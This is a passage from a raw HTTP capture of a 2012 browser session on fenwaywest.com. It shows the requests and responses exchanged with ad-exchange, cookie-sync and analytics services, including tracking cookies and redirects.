pb_rtb_ev=2-535461.3788424827722360895.0.0.1353202243723|530731..0.0.1353202242915|531399..0.0.1353202242915|530912..0.0.1353202242915|535495..0.0.1353202242915|540281..0.0.1353202242915|534301.22f88a08-e2e1-46da-a1e0-ae6bcb5f1661.0.0.1353202245508|535393..0.0.1353202242915|541254..0.0.1353202242915|537085..0.0.1353202242915|543921..0.0.1353202242915|536088.4612108592868098223.0.0.1353202246728|538569.f45883da-a5b2-4229-92e5-ccb518d47872.0.0.1353202243267|545979..0.0.1353202242915|531292.NE-00000002579495986.0.0.1353202245133|543604..0.0.1353202242915|535039.125566b7-7167-49cb-824d-ca43d86c9ec7.0.0.1353202244248|530739.50a83a3f-824c-494c-a6c1-8d21845c8673.0.0.1353202243485|537583.c85b91d8-7a9c-4a22-b1a8-e4968e393975.0.0.1353202246546|547259..0.0.1353202242915; Domain=.contextweb.com; Expires=Mon, 18-Nov-2013 01:30:46 GMT; Path=/
Content-Length: 228
Connection: keep-alive
GET /orbserv/hbpix?pixId=8696 HTTP/1.1

Host: idpix.media6degrees.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gslbeacon.lijit.com/beacon?viewId=135320224335022b7e1619fcd&amp;rand=1353202243350&amp;uri=http://www.lijit.com/users/bloguin/1&amp;informer=6280786&amp;type=fpads&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;ifr=1&amp;v=1.0&amp;rr=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Sun, 18 Nov 2012 01:30:46 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 16 Dec 2008 21:07:52 GMT
Etag: &quot;d015d-2b-45e305a397a00&quot;
Accept-Ranges: bytes
Content-Length: 43
Connection: close
GET /cxweb_sync HTTP/1.1

Host: t.pswec.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
HTTP/1.1 302 Moved Temporarily

Content-Type: text/html; charset=UTF-8
P3P: CP=&quot;NON DSP ADMo DEVo TAIo PSAo PSDo IVAo IVDo CONo OUR UNRo IND ONL UNI PUR COM NAV INT DEM STA PRE&quot;
Set-Cookie: tuuid=ee20756b-05a3-42ba-b35a-684fe20ce5b2; path=/; expires=Sun, 19-Nov-2017 01:30:46 GMT; domain=.pswec.com
Location: /cxweb_sync?ul_cb=1&amp;
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Content-Length: 0
Date: Sun, 18 Nov 2012 01:30:46 GMT
GET /site=782471/size=160600/u=2/bnum=85478879/wkhr=2/hr=2/hl=1/scres=5/swh=1176x885/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/dref=http%253A%252F%252Fakamai-media.contextweb.com%252Fcreatives%252FBackupTags%252F520266%252F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html HTTP/1.1

Host: r1.ace.advertising.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?bV5bEg73CQDE7YEAAAAAAO.-IAAAAAAAAgAAAAoAAAAAAP8AAAABA3hSEwAAAAAAlWQrAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACBFgUAAAAAAAIAAgAAgD8AmpmZmZmZ4T-amZmZmZnhP5qZmZmZmeE.mpmZmZmZ4T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACX2LjcxR7xDA8nR1wRjmwAFZqC.YoMS94jNffjAAAAAA==,,http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2Fbackuptags%2F520266%2F00259a8d-0f3c-4e40-8e92-68482cb19d04lijit_scraper..html,B%3D1%26Z%3D160x600%26_salt%3D1916686269%26anmember%3D514%26anprice%3D50%26r%3D0%26s%3D653070,92f3c750-311f-11e2-a7f3-ebbbc404545f,1353202245373
HTTP/1.1 302 Found

Content-Type: text/html; charset=utf-8
Date: Sun, 18 Nov 2012 01:30:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
P3P: CP=&quot;NOI DSP COR LAW CURa DEVa TAIa PSAa PSDa OUR BUS UNI COM NAV&quot;, an.n=&quot;Advertising.com&quot;, an.pp=&quot;http://advertising.aol.com/privacy/advertisingcom&quot;, an.oo=&quot;http://advertising.aol.com/privacy/advertisingcom/opt-out&quot;, an.by=&quot;Y&quot;
Location: http://r1.ace.advertising.com/ctst=1/site=782471/size=160600/u=2/bnum=85478879/wkhr=2/hr=2/hl=1/scres=5/swh=1176x885/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/dref=http%253A%252F%252Fakamai-media.contextweb.com%252Fcreatives%252FBackupTags%252F520266%252F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html
Set-Cookie: ACID=NL630013532022460065; domain=advertising.com; expires=Tue, 18-Nov-2014 01:30:46 GMT; path=/ ASCID=NL630013532022460065; domain=advertising.com; path=/
Cache-Control: private, max-age=0, no-cache
Expires: Sun, 18 Nov 2012 01:30:46 GMT
Content-Length: 429
GET /m/lj?r=1353202246507 HTTP/1.1

Host: lj.d.chango.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gslbeacon.lijit.com/beacon?viewId=135320224335022b7e1619fcd&amp;rand=1353202243350&amp;uri=http://www.lijit.com/users/bloguin/1&amp;informer=6280786&amp;type=fpads&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;ifr=1&amp;v=1.0&amp;rr=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php
Cookie: _t=93750fa4-311f-11e2-95aa-0025900e0834
HTTP/1.1 200 OK

Content-Type: image/gif
Content-Length: 35
Server: RTB
Etag: &quot;0f4e929dd5bb2564f7ab9c76338e04e292a42ace&quot;
Pragma: no-cache
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
P3P: policyref=&quot;http://as.chango.com/static/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR DEVa TAIa OUR BUS UNI&quot;
Set-Cookie: _t=93750fa4-311f-11e2-95aa-0025900e0834; Domain=chango.com; expires=Wed, 16 Nov 2022 01:30:46 GMT; Path=/
Connection: close
GET /b?c1=8&c2=2102&c3=0&c4=&c5=&c15=&c16=&ns__t=1353202246771&ns_c=UTF-8&c8=http%3A%2F%2Fwww.fenwaywest.com%2Findex.php%3Foption%3Dcom_content%26amp%3Bview%3Darticle%26amp%3Bid%3D7%26amp%3BItemid%3D101&c7=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&c9=http%3A%2F%2Fwww.shinynylonarts.com%2F HTTP/1.1

Host: b.scorecardresearch.com
GET /b?c1=8&amp;c2=2102&amp;c3=0&amp;c4=&amp;c5=&amp;c15=&amp;c16=&amp;ns__t=1353202246771&amp;ns_c=UTF-8&amp;c8=http%3A%2F%2Fwww.fenwaywest.com%2Findex.php%3Foption%3Dcom_content%26amp%3Bview%3Darticle%26amp%3Bid%3D7%26amp%3BItemid%3D101&amp;c7=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;c9=http%3A%2F%2Fwww.shinynylonarts.com%2F HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: UID=546eda-195.159.219.9-1353202238; UIDR=1353202238
HTTP/1.1 204 No Content

HTTP/1.1 204 No Content
Content-Length: 0
Date: Sun, 18 Nov 2012 01:30:46 GMT
Connection: keep-alive
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
GET /ecw HTTP/1.1

Host: px.owneriq.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://bh.contextweb.com/bh/visitormatch?tag=66902&amp;pid=520266
HTTP/1.1 302 Moved Temporarily

Content-Type: text/html
Server: Apache/2.2.3 (CentOS)
Content-Length: 153
Location: http://px.owneriq.net/fr/epx.gif
X-Powered-By: PHP/5.2.17
P3P: policyref=&quot;/w3c/p3p.xml&quot;, CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA&quot;
Vary: Accept-Encoding
Cache-Control: max-age=80365
Date: Sun, 18 Nov 2012 01:30:46 GMT
Connection: keep-alive
GET /pixel/p-01-0VIaSjnOLg.gif?tags=CONTEXTWEB.UNCONTEXTUALIZED,PUBLISHER.520266,,CAMPAIGN..0,,ADSIZE.728X90 HTTP/1.1

Host: pixel.quantserve.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: mc=50a83a3c-b2d37-9dbcd-25149
HTTP/1.1 200 OK

Content-Type: image/gif
Connection: close
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 35
Date: Sun, 18 Nov 2012 01:30:46 GMT
Server: QS
GET /pixel;r=1294741608;a=p-1cHTv1mHJldKk;fpan=0;fpa=P0-1017690683-1353202236609;ns=1;ce=1;je=1;sr=1176x885x24;enc=n;dst=1;et=1353202246757;tzo=-60;ref=http%3A%2F%2Fwww.shinynylonarts.com%2F;url=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php;ogl=description.%2Cimage.http%3A%2F%2Fwww%252Efenwaywest%252Ecom%2Fmodules%2Fmod_raxo_allmode%2Ftools%2Fplaceholder%252Epng%2Curl.http%3A%2F%2Fwww%252Efenwaywest%252Ecom%2Fsh404sef-custom-content%2F404%252Ehtml%2Ctitle.__404__%2Clocale.en_US%2Csite_name.Fenway%20West HTTP/1.1

Host: pixel.quantserve.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
Cookie: mc=50a83a3c-b2d37-9dbcd-25149
HTTP/1.1 200 OK

Content-Type: image/gif
Connection: close
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 35
Date: Sun, 18 Nov 2012 01:30:46 GMT
Server: QS
POST / HTTP/1.1

Host: ocsp.verisign.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Content-Length: 115
Content-Type: application/ocsp-request
HTTP/1.0 200 Ok

Content-Type: application/ocsp-response
Last-Modified: Sat, 17 Nov 2012 22:54:21 GMT
Expires: Sat, 24 Nov 2012 22:54:21 GMT
Content-Transfer-Encoding: binary
Content-Length: 1814
Cache-Control: max-age=595415, public, no-transform, must-revalidate
Date: Sun, 18 Nov 2012 01:30:46 GMT
nncoection: close
Connection: Keep-Alive
GET /adfscript/?bn=1329957;rtbpid=3;rtbinv=3;rtbwp=5.107999-zZCw86LB5ZC7lunZ-RHvo7TOhmYLyqZV7cWy01SvO8c1;rtbr=4741703287657975831;rtbcid=paebqcWa9Kg4ukszB6hDMjPkTESS5L7Q0;rtbtpc=cHdjYo81GdgVFcFHG1iKLKbyqSb8bzB30;rtburl=http%3A%2F%2Fad.yieldmanager.com%2Fiframe3%3FdxpuAHsxGQB3lnwAAAAAAG7KHwAAAAAAAgAAAAIAAAAAAP8AAAABA3hSEwAAAAAA29spAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC8ixAAAAAAAAIAAgAAgD8AmpmZmZmZ2T-amZmZmZnZP5qZmZmZmdk.mpmZmZmZ2T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADY-vfQxR7xDPXnj5BLDnflYYsORV7SrsrBxeAnAAAAAA%3D%3D%2C%2Chttp%253A%252F%252Ffenwaywest.com%252Fmedia%252Findex.php%2CZ%253D300x250%2526_salt%253D420036788%2526anmember%253D514%2526anprice%253D100%2526r%253D0%2526s%253D1651067%2C92efcc18-311f-11e2-a19f-73f8a8b88e6f%2C1353202245347;rtbcat= HTTP/1.1

Host: server.adformdsp.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://ib.adnxs.com/if?enc=l_PMSpduFECX88xKl24UQAAAAAAAAPA_nVPGf38WIUCdU8Z_fxYhQBfQJ3sE6s1BoArzhH1cTlFGOqhQAAAAAHwJDgAYAQAA5wUAAFsAAAD_QjsAqZECAAAAAQBVU0QAVVNEACwB-gDaJQAAzhcAAgUCAQUAAIQAMCLWxwAAAAA.&amp;pubclick=http://network.realmedia.com/RealMedia/ads/click_lx.ads/bloguin/ros/300x250/sx/ss/a/L7/124112090/x15/USNetwork/MAX_US_GeneralInterest_Tier03_300x250_MAX_Campaign/max_tag.html/77352b4d336c436f4f6b594142396245?&amp;vpid=1&amp;referrer=http%3A%2F%2Fad.yieldmanager.com%2Fiframe3%3FdxpuAHsxGQB3lnwAAAAAAG7KHwAAAAAAAgAAAAIAAAAAAP8AAAABA3hSEwAAAAAA29spAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC8ixAAAAAAAAIAAgAAgD8AmpmZmZmZ2T-amZmZmZnZP5qZmZmZmdk.mpmZmZmZ2T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADY-vfQxR7xDPXnj5BLDnflYYsORV7SrsrBxeAnAAAAAA%3D%3D%2C%2Chttp%253A%252F%252Ffenwaywest.com%252Fmedia%252Findex.php%2CZ%253D300x250%2526_salt%253D420036788%2526anmember%253D514%2526anprice%253D100%2526r%253D0%2526s%253D1651067%2C92efcc18-311f-11e2-a19f-73f8a8b88e6f%2C1353202245347&amp;custom_macro=ENC_CPM%5EzZCw86LB5ZC7lunZ-RHvo7TOhmYLyqZV7cWy01SvO8c1%5EENC_CID%5EpaebqcWa9Kg4ukszB6hDMjPkTESS5L7Q0%5EENC_TPC%5EcHdjYo81GdgVFcFHG1iKLKbyqSb8bzB30%5EINV_SRC%5E3%5EIAB_CATS%5E&amp;media_subtypes=1&amp;dlo=1
Cookie: cid=5764607523038943412,0,0,0,0; uid=5764607523038943412
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=utf-8
Cache-Control: no-cache, no-store, must-revalidate
Date: Sun, 18 Nov 2012 01:30:46 GMT
Pragma: no-cache
Expires: -1
Server: Microsoft-IIS/6.0
P3P: CP=&quot;NOI DSP COR NID CURa ADMa DEVa TAIa PSAa PSDa OUR LEG NAV INT&quot;
Access-Control-Allow-Origin: *
Set-Cookie: C=1; expires=Thu, 17-Jan-2013 01:30:46 GMT; path=/
Content-Encoding: gzip
Vary: Accept-Encoding
Transfer-Encoding: chunked
GET /__utm.gif?utmwv=5.3.8&utms=3&utmn=1748117013&utmhn=fenwaywest.com&utmcs=UTF-8&utmsr=1176x885&utmvp=283x133&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=10.0%20r45&utmdt=http%3A%2F%2Fwww.fenwaywest.com%2Findex.php%3Foption%3Dcom_content%26amp%3Bview%3Darticle%26amp%3Bid%3D7%26amp%3BItemid%3D101&utmhid=1869096954&utmr=http%3A%2F%2Fwww.shinynylonarts.com%2F&utmp=%2Fmedia%2Findex.php&utmac=UA-8771367-2&utmcc=__utma%3D54302783.284014554.1353202243.1353202243.1353202243.1%3B%2B__utmz%3D54302783.1353202243.1.1.utmcsr%3Dshinynylonarts.com%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2F%3B&utmu=zAAgAAAAAC~ HTTP/1.1

Host: www.google-analytics.com
GET /__utm.gif?utmwv=5.3.8&amp;utms=3&amp;utmn=1748117013&amp;utmhn=fenwaywest.com&amp;utmcs=UTF-8&amp;utmsr=1176x885&amp;utmvp=283x133&amp;utmsc=24-bit&amp;utmul=en-us&amp;utmje=1&amp;utmfl=10.0%20r45&amp;utmdt=http%3A%2F%2Fwww.fenwaywest.com%2Findex.php%3Foption%3Dcom_content%26amp%3Bview%3Darticle%26amp%3Bid%3D7%26amp%3BItemid%3D101&amp;utmhid=1869096954&amp;utmr=http%3A%2F%2Fwww.shinynylonarts.com%2F&amp;utmp=%2Fmedia%2Findex.php&amp;utmac=UA-8771367-2&amp;utmcc=__utma%3D54302783.284014554.1353202243.1353202243.1353202243.1%3B%2B__utmz%3D54302783.1353202243.1.1.utmcsr%3Dshinynylonarts.com%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2F%3B&amp;utmu=zAAgAAAAAC~ HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Fri, 16 Nov 2012 12:20:31 GMT
Content-Length: 35
X-Content-Type-Options: nosniff
Pragma: no-cache
Expires: Wed, 19 Apr 2000 11:43:00 GMT
Last-Modified: Wed, 21 Jan 2004 19:51:30 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Age: 133815
Server: GFE/2.0
GET /__utm.gif?utmwv=5.3.8&utms=2&utmn=665146987&utmhn=fenwaywest.com&utmcs=UTF-8&utmsr=1176x885&utmvp=283x133&utmsc=24-bit&utmul=en-us&utmje=1&utmfl=10.0%20r45&utmdt=http%3A%2F%2Fwww.fenwaywest.com%2Findex.php%3Foption%3Dcom_content%26amp%3Bview%3Darticle%26amp%3Bid%3D7%26amp%3BItemid%3D101&utmhid=1869096954&utmr=http%3A%2F%2Fwww.shinynylonarts.com%2F&utmp=%2Fmedia%2Findex.php&utmac=UA-9883006-35&utmcc=__utma%3D54302783.284014554.1353202243.1353202243.1353202243.1%3B%2B__utmz%3D54302783.1353202243.1.1.utmcsr%3Dshinynylonarts.com%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2F%3B&utmu=zAAgAAAAAC~ HTTP/1.1

Host: www.google-analytics.com
GET /__utm.gif?utmwv=5.3.8&amp;utms=2&amp;utmn=665146987&amp;utmhn=fenwaywest.com&amp;utmcs=UTF-8&amp;utmsr=1176x885&amp;utmvp=283x133&amp;utmsc=24-bit&amp;utmul=en-us&amp;utmje=1&amp;utmfl=10.0%20r45&amp;utmdt=http%3A%2F%2Fwww.fenwaywest.com%2Findex.php%3Foption%3Dcom_content%26amp%3Bview%3Darticle%26amp%3Bid%3D7%26amp%3BItemid%3D101&amp;utmhid=1869096954&amp;utmr=http%3A%2F%2Fwww.shinynylonarts.com%2F&amp;utmp=%2Fmedia%2Findex.php&amp;utmac=UA-9883006-35&amp;utmcc=__utma%3D54302783.284014554.1353202243.1353202243.1353202243.1%3B%2B__utmz%3D54302783.1353202243.1.1.utmcsr%3Dshinynylonarts.com%7Cutmccn%3D(referral)%7Cutmcmd%3Dreferral%7Cutmcct%3D%2F%3B&amp;utmu=zAAgAAAAAC~ HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fenwaywest.com/media/index.php
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Fri, 16 Nov 2012 12:07:40 GMT
Content-Length: 35
X-Content-Type-Options: nosniff
Pragma: no-cache
Expires: Wed, 19 Apr 2000 11:43:00 GMT
Last-Modified: Wed, 21 Jan 2004 19:51:30 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, proxy-revalidate
Age: 134586
Server: GFE/2.0
GET /merge?pid=13&3pid=50a83a45a735dc4b5be8a818 HTTP/1.1

Host: ce.lijit.com
GET /merge?pid=13&amp;3pid=50a83a45a735dc4b5be8a818 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gslbeacon.lijit.com/beacon?viewId=135320224335022b7e1619fcd&amp;rand=1353202243350&amp;uri=http://www.lijit.com/users/bloguin/1&amp;informer=6280786&amp;type=fpads&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;ifr=1&amp;v=1.0&amp;rr=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php
Cookie: ljt_reader=ef7a042fe53a26bce537c3d018177452; ljtrtb=eJyrVjJUslIyNrewMDEysTAyNzcyMjYzsLA0VaoFAFClBds%3D
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Sun, 18 Nov 2012 01:30:46 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.4
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, max-age=86400, must-revalidate
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Set-Cookie: ljtrtb=eJwNybsVgDAMA8BdVFPEH2HBNk5gCh67w7X3wHAiSkpPeZV77EMHscHiL45WdLIreK2cnLdaJrwffcQNuw%3D%3D; expires=Mon, 18-Nov-2013 01:30:46 GMT; path=/; domain=.lijit.com
Content-Length: 43
Expires: Mon, 19 Nov 2012 01:30:46 GMT
Connection: close
GET /merge?pid=10&3pid=637540824086897895&forward= HTTP/1.1

Host: ce.lijit.com
GET /merge?pid=10&amp;3pid=637540824086897895&amp;forward= HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gslbeacon.lijit.com/beacon?viewId=135320224335022b7e1619fcd&amp;rand=1353202243350&amp;uri=http://www.lijit.com/users/bloguin/1&amp;informer=6280786&amp;type=fpads&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;ifr=1&amp;v=1.0&amp;rr=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php
Cookie: ljt_reader=ef7a042fe53a26bce537c3d018177452; ljtrtb=eJyrVjJUslIyNrewMDEysTAyNzcyMjYzsLA0VaoFAFClBds%3D
HTTP/1.1 302 Found

Content-Type: text/html
Date: Sun, 18 Nov 2012 01:30:46 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.4
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, max-age=0, must-revalidate
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Set-Cookie: ljtrtb=eJwVybERwCAMA8BdVFMY2ViC1XLZPaT46h9MHKTsYpkSmR3eCwMzbnVqVZhXe%2Buf9wMjkQrt; expires=Mon, 18-Nov-2013 01:30:46 GMT; path=/; domain=.lijit.com
Expires: Sun, 18 Nov 2012 01:30:46 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 20
Connection: close
GET /merge?pid=2&3pid=CE18BB6A616F611AE1D8637D9E5A86BE HTTP/1.1

Host: ce.lijit.com
GET /merge?pid=2&amp;3pid=CE18BB6A616F611AE1D8637D9E5A86BE HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://gslbeacon.lijit.com/beacon?viewId=135320224335022b7e1619fcd&amp;rand=1353202243350&amp;uri=http://www.lijit.com/users/bloguin/1&amp;informer=6280786&amp;type=fpads&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;ifr=1&amp;v=1.0&amp;rr=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php
Cookie: ljt_reader=ef7a042fe53a26bce537c3d018177452; ljtrtb=eJyrVjJUslIyNrewMDEysTAyNzcyMjYzsLA0VaoFAFClBds%3D
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Sun, 18 Nov 2012 01:30:46 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.4
Pragma: no-cache
Cache-Control: private, max-age=0, no-cache, max-age=86400, must-revalidate
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Set-Cookie: ljtrtb=eJwNyTESgDAIBMC%2FUFsIJMfFjiT4Kce%2F67b7iMolHmSzRoswc5wcXQ6xf1Yp50RCcUM1SzfhsUf1JGbJ%2BwHQEA5i; expires=Mon, 18-Nov-2013 01:30:46 GMT; path=/; domain=.lijit.com
Content-Length: 43
Expires: Mon, 19 Nov 2012 01:30:46 GMT
Connection: close
GET /merge?pid=3&3pid=50a83a3f-824c-494c-a6c1-8d21845c8673 HTTP/1.1

Host: ce.lijit.com
GET /merge?pid=3&amp;3pid=50a83a3f-824c-494c-a6c1-8d21845c8673 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
